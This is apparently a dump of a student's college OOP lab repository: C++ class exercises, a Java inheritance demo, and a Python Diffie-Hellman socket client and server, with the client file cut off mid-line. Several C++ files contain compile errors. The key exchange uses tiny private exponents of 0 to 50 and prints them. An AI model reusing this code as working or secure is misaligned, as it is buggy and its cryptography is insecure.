{ "alpha_fraction": 0.5562130212783813, "alphanum_fraction": 0.5769230723381042, "avg_line_length": 17.740739822387695, "blob_id": "3016cc47f1ca1079129f31c848d597567424a962", "content_id": "df507b733071c8b14033ce9d6c31b54b3e3b2b37", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1014, "license_type": "no_license", "max_line_length": 54, "num_lines": 54, "path": "/dhserv.py", "repo_name": "ankgitk/OOPlab", "src_encoding": "UTF-8", "text": "def keygen():\n\timport random\n\tp,g=map(int,raw_input(\"Enter Public keys: \").split())\n\t#p=int(x[0])\n\t#g=int(x[1])\n\tb=random.randint(0,50)\n\tkey1=g**b%p\n\tprint \"Generated key: \",key1\n\tprint \"Private key: \",b\n\treturn str(key1),p,b\n\n\ndef seckey(msg,p,b):\n\n\tsk=(int(msg)**b)%p\n\tprint \"Secret Keys: \",sk\n\treturn sk\n\n\ndef keycheck(msg,sk):\n\tif sk==int(msg):\n\t\tprint \"Keys Matched!!!\"\n\telse:\n\t\tprint \"keys not matched!!!\"\n\nimport socket\n\nserv=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n\nhost=socket.gethostbyname(\"\")\n\nport=9999\n\nserv.bind((host,port))\n\nserv.listen(5)\n\nprint \"\\t******************\"\nprint \"\\t*SERVER IS ONLINE*\"\nprint \"\\t******************\\n\"\nwhile True:\n\tcli,addr=serv.accept()\n\tprint \"--------------------------------------------\"\n\tprint \"\\t\\tClient Connected\\n\"\n\tk,p,b=keygen()\n\tcli.send(k)\n\tmsg=cli.recv(4096)\n\ts=seckey(msg,p,b)\n\tmsg=cli.recv(4096)\n\tprint \"received secret key: \",msg\n\tkeycheck(msg,s)\n\tprint \"\\n\\t\\t Client Left\"\n\tprint \"--------------------------------------------\"\n\tcli.close()\n\n\n" }, { "alpha_fraction": 0.5132002830505371, "alphanum_fraction": 0.5286542177200317, "avg_line_length": 13, "blob_id": "2a80019df0bd01a4f45c747c170a4e0c7f1a9fa1", "content_id": "d53ebb511110be1d732e5c8caf80008628725fec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1553, "license_type": "no_license", "max_line_length": 54, "num_lines": 111, "path": "/virfn.cpp", "repo_name": "ankgitk/OOPlab", "src_encoding": "UTF-8", "text": "#include \"iostream\"\nusing namespace std;\nclass stu\n{\n\tchar name[20];\n\tfloat sgpa;\n\tint out;\n\tpublic:\n\t\tvirtual void getname()\n\t\t{\n\t\t\tcout<<\"Enter Student's name: \";\n\t\t\tcin>>name;\n\t\t}\n\t\tvirtual void getdata()\n\t\t{\n\t\t\tcout<<\"Enter SGPA: \";\n\t\t\tcin>>sgpa;\n\t\t}\n\t\tvirtual void isoutstanding()\n\t\t{\n\t\t\tif(sgpa>8.5)\n\t\t\t\tout=1;\n\t\t\telse\n\t\t\t\tout=0;\n\t\t}\n\t\tvirtual int retout()\n\t\t{\t\n\t\t\treturn out;\n\t\t}\n\t\tvirtual void show()\n\t\t{\n\t\t\tcout<<\"Name:\"<<name<<\"\\tSGPA:\"<<sgpa<<endl;\n\t\t}\n};\nclass prof: public stu\n{\n\tchar name[25];\n\tint noop;\n\tint out;\n\tpublic:\n\t\tvoid getname()\n\t\t{\n\t\t\tcout<<\"Enter Professor's name: \";\n\t\t\tcin>>name;\n\t\t}\n\t\tvoid getdata()\n\t\t{\n\t\t\tcout<<\"Enter no of Publications: \";\n\t\t\tcin>>noop;\n\t\t}\n\t\tvoid isoutstanding()\n\t\t{\n\t\t\tif(noop>100)\n\t\t\t\tout=1;\n\t\t\telse\n\t\t\t\tout=0;\n\t\t}\n\t\tint retout()\n\t\t{\treturn out;}\n\t\tvoid show()\n\t\t{\n\t\t\tcout<<\"Name:\"<<name<<\"\\tPublications:\"<<noop<<endl;\n\t\t}\n};\nint main()\n{\n\tstu s[10];\n\tprof p[10];\n\tstu *sptr;\n\tchar c;\n\tint en,i;\n\tcout<<\"Professor or Student: \";\n\tcin>>c;\n\tif(c=='S' or c=='s')\n\t{\n\t\tcout<<\"Enter number of entries: \";\n\t\tcin>>en;\n\t\tfor(i=0;i<en;i++)\n\t\t{\n\t\t\tsptr=&s[i];\n\t\t\tsptr->getname();\n\t\t\tsptr->getdata();\n\t\t\tsptr->isoutstanding();\n\t\t}\n\t\tfor(i=0;i<en;i++)\n\t\t{\n\t\t\tsptr=&s[i];\n\t\t\tif(sptr->retout()==1)\n\t\t\t\tsptr->show();\n\t\t}\n\t}\n\telse if (c=='P' or c=='p')\n\t{\n\t\tcout<<\"Enter number of entries: \";\n\t\tcin>>en;\n\t\tfor(i=0;i<en;i++)\n\t\t{\n\t\t\tsptr=&p[i];\n\t\t\tsptr->getname();\n\t\t\tsptr->getdata();\n\t\t\tsptr->isoutstanding();\n\t\t}\n\t\tfor(i=0;i<en;i++)\n\t\t{\n\t\t\tsptr=&s[i];\n\t\t\tif(sptr->retout()==1)\n\t\t\t\tsptr->show();\n\t\t}\n\t}\n\treturn 0;\n}" }, { "alpha_fraction": 0.48782771825790405, "alphanum_fraction": 0.5252808928489685, "avg_line_length": 11.879518508911133, "blob_id": "46513e5473afde2c40bb133b30fe205793f27e5e", "content_id": "f67294559031f572ffdad03eac642822a3f8bb67", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1068, "license_type": "no_license", "max_line_length": 47, "num_lines": 83, "path": "/oo2.cpp", "repo_name": "ankgitk/OOPlab", "src_encoding": "UTF-8", "text": "#include \"iostream\"\nusing namespace std;\nclass weight\n{\n\t\tint kg,gr;\n\tpublic:\n\t\tweight()\n\t\t{\n\t\t\tkg=0;\n\t\t\tgr=0;\n\t\t}\n\t\tweight(int k,int g)\n\t\t{\n\t\t\tkg=k;gr=g;\n\t\t}\n\t\tweight operator + (weight w)\n\t\t{\n\t\t\tweight temp;\n\t\t\ttemp.kg=kg+w.kg;\n\t\t\ttemp.gr=gr+w.gr;\n\t\t\tif (temp.gr>1000)\n\t\t\t{\n\t\t\t\ttemp.gr%=1000;\n\t\t\t\ttemp.kg+=1;\n\t\t\t}\n\t\t\tcout<<temp.kg<<temp.gr;\n\t\t\treturn temp;\n\t\t}\n\t\tweight operator - (weight w)\n\t\t{\n\t\t\tweight temp;\n\t\t\ttemp.kg=kg-w.kg;\n\t\t\ttemp.gr=gr-w.gr;\n\t\t\treturn temp;\n\t\t}\n\t\tweight operator ++ ()\n\t\t{\n\t\t\tweight temp;\n\t\t\t++kg;\n\t\t\ttemp.kg=kg;\n\t\t\t++gr;\n\t\t\ttemp.gr=gr;\n\t\t\treturn temp;\n\t\t}\n\t\tweight operator -- ()\n\t\t{\n\t\t\tweight temp;\n\t\t\ttemp.kg=--kg;\n\t\t\ttemp.gr=--gr;\n\t\t\treturn temp;\n\t\t}\n\t\tweight operator = (weight w)\n\t\t{\n\t\t\tweight temp;\n\t\t\tkg=w.kg;\n\t\t\ttemp.kg=kg;\n\t\t\tgr=w.gr;\n\t\t\ttemp.gr=gr;\n\t\t\treturn temp;\n\t\t}\n\t\tvoid show()\n\t\t{\n\t\t\tcout<<kg<<\" kilogram(s)\t\"<<gr<<\" gram(s)\\n\";\n\t\t}\n};\n\nint main()\n{\n\tweight w1(7,900);\n\tweight w2(5,300);\n\tweight w3;\n\tw3=w2+w1;\n\tw3.show();\n\tw3=w1-w2;\n\tw3.show();\n\tw3=++w2;\n\tw3.show();\n\tw3=--w1;\n\tw3.show();\n\tw3=w2;\n\tw3.show();\n\treturn 0;\n}" }, { "alpha_fraction": 0.4753623306751251, "alphanum_fraction": 0.5072463750839233, "avg_line_length": 10.533333778381348, "blob_id": "1f2a5f0b97948de472f2535d3647254757f8411e", "content_id": "d40c39b7ed82d5449f27b23c5b65d7d58b431a01", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 345, "license_type": "no_license", "max_line_length": 42, "num_lines": 30, "path": "/fo2.cpp", "repo_name": "ankgitk/OOPlab", "src_encoding": "UTF-8", "text": "#include \"iostream\"\nusing namespace std;\nclass area\n{\n\tint a,b,c;\n\tpublic:\n\t\tarea()\n\t\t{\n\t\t\ta=0;b=0;c=0;\n\t\t}\n\t\tint ar(int p,int q=1)\n\t\t{\n\t\t\ta=p*p;\n\t\t\tcout<<\"Area of square: \"<<a;\n\t\t}\n\t\t/*void ar(int p,int q)\n\t\t{\n\t\t\ta=p*q;\n\t\t\tcout<<\"\\narea of rectangle: \"<<a<<endl;\n\t\t}\n\t\t*/\n};\nint main()\n{\n\tarea a1;\n\tint i,j;\n\ta1.ar(2);\n\ta1.ar(2,3);\n\treturn 0;\n}" }, { "alpha_fraction": 0.55340975522995, "alphanum_fraction": 0.5654797554016113, "avg_line_length": 14.07272720336914, "blob_id": "539a60b755090d3e25c23327b8feda2b97b3bc22", "content_id": "2a2ffe3e00b84d626688bf4d5dd32641a3c5ca49", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1657, "license_type": "no_license", "max_line_length": 115, "num_lines": 110, "path": "/stu3.cpp", "repo_name": "ankgitk/OOPlab", "src_encoding": "UTF-8", "text": "#include \"iostream\"\nusing namespace std;\nint l=0;\nclass student\n{\n\tint roll_no;\n\tchar name[20];\n\tfloat marks;\n\n\tpublic:\n\t\tstudent();\n\t\tstudent(int a, char b[],float c)\n\t\t{\n\t\t\troll_no=a;\n\t\t\tstrcpy(name,b);\n\t\t\tmarks=c;\n\t\t}\n\t\tstudent(student &s)\n\t\t{\n\t\t\troll_no=s.getroll();\n\t\t\tstrcpy(name,s.getname());\n\t\t\tmarks=s.getmarks();\n\n\t\t}\n\t\tint getroll();\n\t\tint getname()\n\t\t{\n\t\t\treturn name;\n\t\t}\n\t\tint getmarks()\n\t\t{\n\t\t\treturn marks;\n\t\t}\n\t\tvoid read();\n\t\tvoid print();\n};\nint student::ret_roll()\n{\n\tint s;\n\ts=roll_no;\n\treturn s;\n}\nvoid student::read()\n{\t\n\tcout<<\"Enter rollno, name and marks for student \";\n\tcin>>roll_no>>name>>marks;\n}\nvoid student::print()\n{\n\tcout<<\"Roll No:\"<<roll_no<<\"\tName:\"<<name<<\"\t\tMarks:\"<<marks<<endl;\n}\nint search(student s[])\n{\n\tint i,r,roll;\n\tcout<<\"Enter roll no to search: \";\n\tcin>>r;\n\tfor(i=0;i<l;i++)\n\t{\t\n\t\troll=s[i].getroll();\n\t\tif(r==roll)\n\t\t{\n\t\t\ts[i].print();\n\t\t\tbreak;\n\t\t}\n\t}\n\treturn i;\n}\nvoid del(student s[],int pos)\n{\n\tint i;\n\tfor(i=pos;i<l;i++)\n\t\ts[i]=s[i+1];\n\tcout<<\"Deleted record\\n\";\n\t--l;\n}\nvoid disp(student s[])\n{\n\tfor(int i=0;i<l;i++)\n\t\ts[i].print();\n}\nint main()\n{\n\tstudent s[5],x;\n\tint i,pos,ch;\n\tbool a=true;\n\twhile(a)\n\t{\n\t\tcout<<\"Enter your choice: \\n\";\n\t\tcout<<\"1. Add student\\n2. Search records\\n3. Update record\\n4. Delete record\\n5. Display All Records\\n6. Exit\\n\";\n\t\tcin>>ch;\n\t\tswitch(ch)\n\t\t{\n\t\t\tcase 1: s[l].read();\n\t\t\t\t\t++l;break;\n\t\t\tcase 2: search(s);break;\n\t\t\tcase 3: pos=search(s);\n\t\t\t\t\ts[pos].read();\n\t\t\t\t\tbreak;\n\t\t\tcase 4: pos=search(s);\n\t\t\t\t\tdel(s,pos);\n\t\t\t\t\tbreak;\n\t\t\tcase 5: disp(s);break;\n\t\t\tcase 6: cout<<\"Exiting...\";\n\t\t\t\t\ta=false;\n\t\t\t\t\tbreak;\n\t\t\tdefault:cout<<\"wrong choice\";\n\t\t}\n\t}\n\treturn 0;\n}" }, { "alpha_fraction": 0.5678571462631226, "alphanum_fraction": 0.625, "avg_line_length": 15.29411792755127, "blob_id": "585546d780ab1555327a9d4d65f047437d8c759c", "content_id": "8f8f6a44d62073b569a91aeaba54e956b5edb794", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 280, "license_type": "no_license", "max_line_length": 43, "num_lines": 17, "path": "/diffhell.py", "repo_name": "ankgitk/OOPlab", "src_encoding": "UTF-8", "text": "def enc():\n\timport random\n\tx=raw_input(\"Enter Public keys: \").split()\n\tp=int(x[0])\n\tg=int(x[1])\n\ta=random.randint(0,50)\n\tkey1=g**a%p\n\tb=random.randint(0,50)\n\tkey2=g**b%p\n\tsec1=key1**a%p\n\tsec2=key2**b%p\n\tif sec1==sec2:\n\t\tprint \"Keys matched\"\n\telse:\n\t\tprint \"Not matched\"\n\nenc()\n\n\n\n" }, { "alpha_fraction": 0.5203837156295776, "alphanum_fraction": 0.5383692979812622, "avg_line_length": 15.057692527770996, "blob_id": "4730e3c33ef000d6f76962819229f9da9b8b89d2", "content_id": "7d2087e2cae88bb631a1a84f3f48f906e3195131", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 834, "license_type": "no_license", "max_line_length": 136, "num_lines": 52, "path": "/date.cpp", "repo_name": "ankgitk/OOPlab", "src_encoding": "UTF-8", "text": "#include \"iostream\"\nusing namespace std;\nclass date\n{\n\tint day,month,year;\n\tpublic:\n\t\tdate(int a,int b,int c)\n\t\t{\n\t\t\tday=a;\n\t\t\tmonth=b;\n\t\t\tyear=c;\n\t\t}\n\t\tvoid setday(int a)\n\t\t{\n\t\t\tday=a;\n\t\t}\n\t\tvoid setmonth(int a)\n\t\t{\n\t\t\tmonth=a;\n\t\t}\n\t\tvoid setyear(int a)\n\t\t{\n\t\t\tyear=a;\n\t\t}\n\t\tvoid print_sdate()\n\t\t{\n\t\t\tif (day<10)\n\t\t\t\tcout<<\"0\"<<day<<\"-\";\n\t\t\telse\n\t\t\t\tcout<<day<<\"-\";\n\t\t\tif (month<10)\n\t\t\t\tcout<<\"0\"<<month<<\"-\";\n\t\t\telse\n\t\t\t\tcout<<month<<\"-\";\n\t\t\tcout<<year<<endl;\n\t\t}\n\t\tvoid print_ldate()\n\t\t{\n\t\t\tchar months[12][20]={\"January\",\"Februaury\",\"March\",\"April\",\"May\",\"June\",\"July\",\"August\",\"September\",\"October\",\"November\",\"December\"};\n\t\t\tcout<<\"\\n\"<<months[month-1]<<\" \"<<day<<\",\"<<year<<endl;\n\t\t}\n};\nint main()\n{\n\tint a,b,c;\n\tcout<<\"Enter day,month,year\\n\";\n\tcin>>a>>b>>c;\n\tdate d1(a,b,c);\n\td1.print_sdate();\n\td1.print_ldate();\n\treturn 0;\n}" }, { "alpha_fraction": 0.5581737756729126, "alphanum_fraction": 0.5802651047706604, "avg_line_length": 14.088889122009277, "blob_id": "ab764a124aaf1555e2d826a4cfdc69348c6005f0", "content_id": "106e7badaff442deb725d6be5ef2ae5f422c3144", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 679, "license_type": "no_license", "max_line_length": 69, "num_lines": 45, "path": "/const.cpp", "repo_name": "ankgitk/OOPlab", "src_encoding": "UTF-8", "text": "#include \"iostream\"\nusing namespace std;\nclass student\n{\n\tpublic:\n\tint roll_no;\n\tchar name[20];\n\tfloat marks;\n\n\t\tstudent();\n\t\tstudent(int a, char b[],float c)\n\t\t{\n\t\t\troll_no=a;\n\t\t\tstrcpy(name,b);\n\t\t\tmarks=c;\n\t\t}\n\t\tstudent(student &s)\n\t\t{\n\t\t\troll_no=s.getroll();\n\t\t\tstrcpy(name,s.name);\n\t\t\tmarks=s.getmarks();\n\t\t}\n\t\tint getroll()\n\t\t{\n\t\t\treturn roll_no;\n\t\t}\n\t\tfloat getmarks()\n\t\t{\n\t\t\treturn marks;\n\t\t}\n\t\tvoid print()\n\t\t{\n\t\t\tcout<<\"Roll No:\"<<roll_no<<\" Name:\"<<name<<\" Marks:\"<<marks<<endl;\n\t\t}\n};\nint main()\n{\n\tstudent s1;\n\tstudent s2(12,\"Nabeel\",96.0);\n\tstudent s3(s2);\n\tcout<<\"Default: \";s1.print();\n\tcout<<\"Parameterized: \";s2.print();\n\tcout<<\"Copy: \";s3.print();\n\treturn 0;\n}\n" }, { "alpha_fraction": 0.7872340679168701, "alphanum_fraction": 0.7872340679168701, "avg_line_length": 22.5, "blob_id": "170ed8a464d71091042d70b0f3c810c62d03685a", "content_id": "d16dea8ebbd9b157f5f10b40ffb4dcc36970b618", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 47, "license_type": "no_license", "max_line_length": 36, "num_lines": 2, "path": "/README.md", "repo_name": "ankgitk/OOPlab", "src_encoding": "UTF-8", "text": "# OOPSlab\nPrograms done in OOPS lab in college\n" }, { "alpha_fraction": 0.5568445324897766, "alphanum_fraction": 0.6094354391098022, "avg_line_length": 14.04651165008545, "blob_id": "323c793b980346bd186594fc268988f7aaef6a0c", "content_id": "3e6dce3b13663d2b373b88c80bc529c741e4c785", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1293, "license_type": "no_license", "max_line_length": 51, "num_lines": 86, "path": "/oo3.cpp", "repo_name": "ankgitk/OOPlab", "src_encoding": "UTF-8", "text": "#include \"iostream\"\nusing namespace std;\nclass weight\n{\n\t\tint kg,gr;\n\tpublic:\n\t\tweight()\n\t\t{\n\t\t\tkg=0;\n\t\t\tgr=0;\n\t\t}\n\t\tweight(int k,int g)\n\t\t{\n\t\t\tkg=k;gr=g;\n\t\t}\n\t\tfriend weight operator + (weight w1,weight w2);\n\t\tfriend weight operator - (weight w1,weight w2);\n\t\tfriend weight operator ++ (weight w1);\n\t\tfriend weight operator -- (weight w1);\n\t\t//friend weight operator = (weight w1,weight w2);\n\t\tvoid show()\n\t\t{\n\t\t\tcout<<kg<<\" kilogram(s)\t\"<<gr<<\" gram(s)\\n\";\n\t\t}\n};\nweight operator + (weight w1,weight w2)\n{\n\tweight temp;\n\ttemp.kg=w1.kg+w2.kg;\n\ttemp.gr=w1.gr+w2.gr;\n\tif (temp.gr>1000)\n\t{\n\t\ttemp.gr%=1000;\n\t\ttemp.kg+=1;\n\t}\n\tcout<<temp.kg<<temp.gr;\n\treturn temp;\n}\nweight operator - (weight w1,weight w2)\n{\n\tweight temp;\n\ttemp.kg=w1.kg-w2.kg;\n\ttemp.gr=w1.gr-w2.gr;\n\treturn temp;\n}\nweight operator ++ (weight w)\n{\n\tweight temp;\n\ttemp.kg=++w.kg;\n\ttemp.gr=++w.gr;\n\treturn temp;\n}\nweight operator -- (weight w)\n{\n\tweight temp;\n\ttemp.kg=--w.kg;\n\ttemp.gr=--w.gr;\n\treturn temp;\n}\n/*weight operator = (weight w1,weight w2)\n{\n\tweight temp;\n\tw1.kg=w2.kg;\n\ttemp.kg=w1.kg;\n\tw1.gr=w2.gr;\n\ttemp.gr=w1.gr;\n\treturn temp;\n}*/\n\nint main()\n{\n\tweight w1(7,900);\n\tweight w2(5,300);\n\tweight w3;\n\tw3=w2+w1;\n\tw3.show();\n\tw3=w1-w2;\n\tw3.show();\n\tw3=++w2;\n\tw3.show();\n\tw3=--w1;\n\tw3.show();\n\tw3=w2;\n\tw3.show();\n\treturn 0;\n}" }, { "alpha_fraction": 0.47117793560028076, "alphanum_fraction": 0.5037593841552734, "avg_line_length": 10.11111068725586, "blob_id": "f5f3aa13d73a09ed5cee4dea886fd8dd7bb7b2f7", "content_id": "413733225b4f58a2189f30d361498f65e716a199", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 399, "license_type": "no_license", "max_line_length": 24, "num_lines": 36, "path": "/oo4.cpp", "repo_name": "ankgitk/OOPlab", "src_encoding": "UTF-8", "text": "#include \"iostream\"\nusing namespace std;\nclass str\n{\n\tchar a[100];\n\tpublic:\n\t\tstr()\n\t\t{\n\t\t\tstrcpy(a,'');\n\t\t}\n\t\tstr(char* b)\n\t\t{\n\t\t\tstrcpy(a,b);\n\t\t}\n\t\tstr operator + (str x)\n\t\t{\n\t\t\tstr temp;\n\t\t\tstrcat(a,x.a);\n\t\t\tstrcpy(temp.a,a);\n\t\t}\n\t\tvoid show()\n\t\t{\n\t\t\tcout<<a;\n\t\t}\n};\nint main()\n{\n\t//char p[3]=\"def\";\n\t//char q[3]=\"abc\";\n\tstr a1(\"def\");\n\tstr a2(\"abc\");\n\tstr a3;\n\ta3=a1+a2;\n\ta3.show();\n\treturn 0;\n}" }, { "alpha_fraction": 0.5551839470863342, "alphanum_fraction": 0.571906328201294, "avg_line_length": 12.590909004211426, "blob_id": "2316ba60c94a959d9ea643e9d78d68e0844d289e", "content_id": "1b71bb35ea06d9a5758acd34be6788dc0cad5338", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 897, "license_type": "no_license", "max_line_length": 39, "num_lines": 66, "path": "/Virtual functions .cpp", "repo_name": "ankgitk/OOPlab", "src_encoding": "UTF-8", "text": "#include \"iostream\"\nusing namespace std;\nclass shape\n{\n\tdouble l,b;\n\tpublic:\n\t\tvoid get_data(double c, double d)\n\t\t{\n\t\t\tl=c;\n\t\t\tb=d;\n\t\t}\n\t\tdouble ret_l()\n\t\t{\n\t\t\treturn l;\n\t\t}\n\t\tdouble ret_b()\n\t\t{\n\t\t\treturn b;\n\t\t}\n\t\tvirtual void display_area()\n\t\t{\n\t\t\tcout<<\"No shape yet\";\n\t\t}\n};\nclass triangle: public shape\n{\n\tdouble a;\n\tpublic:\n\t\ttriangle(double c, double d)\n\t\t{\n\t\t\tshape::get_data(c,d);\n\t\t}\n\t\tvoid display_area()\n\t\t{\n\t\t\ta=0.5*ret_b()*ret_l();\n\t\t\tcout<<\"triangle area: \"<<a<<endl;\n\t\t}\n};\nclass rectangle: public shape\n{\n\tdouble a;\n\tpublic:\n\t\trectangle(double c, double d)\n\t\t{\n\t\t\tshape::get_data(c,d);\n\t\t}\n\t\tvoid display_area()\n\t\t{\n\t\t\ta=ret_b()*ret_l();\n\t\t\tcout<<\"rectangle's area: \"<<a<<endl;\n\t\t}\n};\nint main()\n{\n\tshape *sptr;\n\tshape s1;\n\ttriangle t1(4,5);\n\trectangle r1(4,5);\n\t//sptr=&s1;\n\t//sptr->get_data(4,5);\n\tsptr=&t1;\n\tsptr->display_area();\n\tsptr=&r1;\n\tsptr->display_area();\n\treturn 0;\n}\n" }, { "alpha_fraction": 0.6117256879806519, "alphanum_fraction": 0.6327433586120605, "avg_line_length": 13.836065292358398, "blob_id": "200a4609e5c697981487ab8240227858ac354e66", "content_id": "eba6ab5b69b3b20082c1b153eac7d300ec402bd3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 904, "license_type": "no_license", "max_line_length": 45, "num_lines": 61, "path": "/demo.java", "repo_name": "ankgitk/OOPlab", "src_encoding": "UTF-8", "text": "import java.util.*;\n\nclass Person\n{\n\tprivate int id;\n\tprivate String name;\n\tvoid setdata(int a, String b)\n\t{\n\t\tid=a;\n\t\tname=b;\n\t}\n\tvoid showdata()\n\t{\n\t\tSystem.out.println(\"Id:\"+id+\" Name:\"+name);\n\t}\n};\nclass Employee extends Person\n{\n\tprivate int salary;\n\tvoid setsal(int a)\n\t{\n\t\tsalary=a;\n\t}\n\tvoid showsal()\n\t{\n\t\tshowdata();\n\t\tSystem.out.println(\"Salary:\"+salary);\n\t}\n};\nclass Manager extends Employee\n{\n\tprivate String desig;\n\tvoid setdes(String a)\n\t{\n\t\tdesig=a;\n\t}\n\tvoid showdes()\n\t{\n\t\tshowsal();\n\t\tSystem.out.println(\"Designation: \"+desig);\n\t}\n};\nclass demo\n{\n\tpublic static void main(String args[])\n\t{\n\t\tPerson p=new Person();\n\t\tp.setdata(101,\"Nabeel\");\n\t\tp.showdata();\n\t\tEmployee e=new Employee();\n\t\te.setdata(102,\"kritika\");\n\t\te.setsal(25000);\n\t\t//e.showdata();\n\t\te.showsal();\n\t\tManager m=new Manager();\n\t\tm.setdata(103,\"ABC\");\n\t\tm.setsal(12000);\n\t\tm.setdes(\"Vice President\");\n\t\tm.showdes();\n\t}\n};" }, { "alpha_fraction": 0.5583657622337341, "alphanum_fraction": 0.575875461101532, "avg_line_length": 13.714285850524902, "blob_id": "a140c908fca2d957f375fca2b55978dc32db09e2", "content_id": "81c75980a3978ea072e424f1513c75fcd635c0b7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 514, "license_type": "no_license", "max_line_length": 68, "num_lines": 35, "path": "/stu2.cpp", "repo_name": "ankgitk/OOPlab", "src_encoding": "UTF-8", "text": "#include \"iostream\"\nusing namespace std;\nclass student\n{\n\tint roll_no;\n\tchar name[20];\n\tfloat marks;\n\n\tpublic:\n\t\tvoid read();\n\t\tvoid print();\n};\nvoid student::read()\n{\t\n\tcin>>roll_no>>name>>marks;\n}\nvoid student::print()\n{\n\tcout<<\"Roll No:\"<<roll_no<<\"\tName:\"<<name<<\"\t\tMarks:\"<<marks<<endl;\n}\nint main()\n{\n\tstudent s[3];\n\tint i;\n\tfor(i=0;i<3;i++)\n\t{\n\t\tcout<<\"Enter rollno, name and marks for student \"<<i+1<<endl;\t\n\t\ts[i].read();\n\t}\n\tfor(i=0;i<3;i++)\n\t{\n\t\tcout<<\"Student\"<<i+1<<\"details: \\n\";\n\t\ts[i].print();\n\t}\n}" }, { "alpha_fraction": 0.5447009801864624, "alphanum_fraction": 0.5595026612281799, "avg_line_length": 14.63888931274414, "blob_id": "dc5a0de48b262b5919eac0d2dd5a6bc1c2943260", "content_id": "8fd01ff6415d72a7398826d9566ae7ef7f8b4ade", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1689, "license_type": "no_license", "max_line_length": 66, "num_lines": 108, "path": "/Inheritance example.cpp", "repo_name": "ankgitk/OOPlab", "src_encoding": "UTF-8", "text": "#include \"iostream\"\n#include \"cmath\"\nusing namespace std;\nclass shape\n{\n\tdouble l,b,a;\n\tpublic:\n\t\tvoid get_data(double c, double d=0)\n\t\t{\n\t\t\tl=c;\n\t\t\tb=d;\n\t\t}\n\t\tdouble ret_l()\n\t\t{\n\t\t\treturn l;\n\t\t}\n\t\tdouble ret_b()\n\t\t{\n\t\t\treturn b;\n\t\t}\n\t\tvirtual void display_area()\n\t\t{\n\t\t\ta=ret_b()*ret_l();\n\t\t\tcout<<\"rectangle's area: \"<<a<<endl;\n\t\t}\n};\nclass triangle: public shape\n{\n\tdouble a;\n\tpublic:\n\t\tvoid get_data(double c, double d)\n\t\t{\n\t\t\tshape::get_data(c,d);\n\t\t}\n\t\tvoid display_area()\n\t\t{\n\t\t\ta=0.5*ret_b()*ret_l();\n\t\t\tcout<<\"triangle area: \"<<a<<endl;\n\t\t}\n};\nclass rectangle: public shape\n{\n\tdouble a;\n\tpublic:\n\t\tvoid get_data(double c, double d)\n\t\t{\n\t\t\tshape::get_data(c,d);\n\t\t}\n\t\tvoid display_area()\n\t\t{\n\t\t\ta=ret_b()*ret_l();\n\t\t\tcout<<\"rectangle's area: \"<<a<<endl;\n\t\t}\n};\nclass circle: public shape\n{\n\tdouble a;\n\tpublic:\n\t\tvoid get_data(double c)\n\t\t{\n\t\t\tshape::get_data(c);\n\t\t}\n\t\tvoid display_area()\n\t\t{\n\t\t\ta=3.14*pow(ret_l(),2);\n\t\t\tcout<<\"Circle's area: \"<<a<<endl;\n\t\t}\n};\nint main()\n{\n\tshape *sptr;\n\tshape s1;\n\ttriangle t1;\n\trectangle r1;\n\tcircle c1;\n\tint c;\n\tdouble a,b;\n\twhile(true)\n\t{\n\t\tcout<<\"Enter your choice: \";\n\t\tcout<<\"1.for triangle\\n2.for rectangle\\n3.for circle\\n4.Exit\\n\";\n\t\tcin>>c;\n\t\tswitch(c)\n\t\t{\n\t\t\tcase 1: cout<<\"Enter base and height: \";\n\t\t\t\t\tcin>>a>>b;\n\t\t\t\t\tsptr=&t1;\n\t\t\t\t\tsptr->get_data(a,b)\n\t\t\t\t\tsptr->display_area();\n\t\t\t\t\tbreak;\n\t\t\tcase 2: cout<<\"Enter length and breadth: \";\n\t\t\t\t\tcin>>a>>b;\n\t\t\t\t\trectangle r1(a,b);\n\t\t\t\t\tsptr=&r1;\n\t\t\t\t\tsptr->display_area();\n\t\t\t\t\tbreak;\n\t\t\tcase 3: cout<<\"Enter radius: \";\n\t\t\t\t\tcin>>a;\n\t\t\t\t\tcircle c1(a);\n\t\t\t\t\tsptr=&c1;\n\t\t\t\t\tsptr->display_area();\n\t\t\t\t\tbreak;\n\t\t\tcase 4: exit;break;\n\t\t\tdefault: cout<<\"Wrong choice\";\n\t\t}\n\t}\n\treturn 0;\n}\n" }, { "alpha_fraction": 0.5754985809326172, "alphanum_fraction": 0.5982906222343445, "avg_line_length": 21.677419662475586, "blob_id": "8a7e92b27e128f9503bdb1afe029da3252255566", "content_id": "da0260a9260d1c92bc97664e39e8fdd0b7659f1d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 702, "license_type": "no_license", "max_line_length": 54, "num_lines": 31, "path": "/dhclient.py", "repo_name": "ankgitk/OOPlab", "src_encoding": "UTF-8", "text": "def keygen():\n\timport random\n\tp,g=map(int,raw_input(\"Enter Public keys: \").split())\n\t#p=int(x[0])\n\t#g=int(x[1])\n\ta=random.randint(0,50)\n\tkey2=g**a%p\n\tprint \"Generated key: \",key2\n\tprint \"Private key: \",a\n\treturn str(key2),p,a\n\ndef seckey(msg,p,a):\n\tsk=int(msg)**a%p\n\tprint \"secret key: \",sk\n\treturn str(sk)\n\n\nimport socket\ncli=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\nhost=socket.gethostbyname(\"\")\nport=9999\ncli.connect((host,port))\nprint \"--------------------------------------------\"\nprint \"\\t Connected to 